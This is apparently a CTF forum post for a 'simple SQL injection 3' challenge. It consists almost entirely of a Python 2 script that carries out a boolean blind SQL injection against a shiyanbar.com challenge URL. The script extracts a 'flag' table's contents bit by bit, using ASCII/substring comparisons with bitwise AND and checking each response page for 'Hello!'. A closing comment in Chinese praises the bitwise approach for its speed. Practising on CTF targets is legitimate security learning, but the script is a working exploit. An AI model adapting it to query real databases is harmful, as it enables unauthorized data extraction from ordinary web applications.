6.简单sql注入之3-11846238
#!/usr/bin/python#coding=utf-8
#Author = One
import requests
def main():
n = 0
binary = ""
flag = ""
for i in range(1,1000):
for j in range(8):
url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
request = requests.get(url)
if(request.text.find('Hello!') != -1):
binary = '1'+binary
n = 0
else:
binary = '0'+binary
n += 1
print chr(int(binary,2)),
flag += chr(int(binary,2))
binary = ""
if(n >= 8):
print "\n"+flag
break
if __name__ == '__main__':
main()
#上述代码使用的是按位与方法,比普通循环遍历所有可能字符要快,比较8次必得一个字符结果
页:
[1]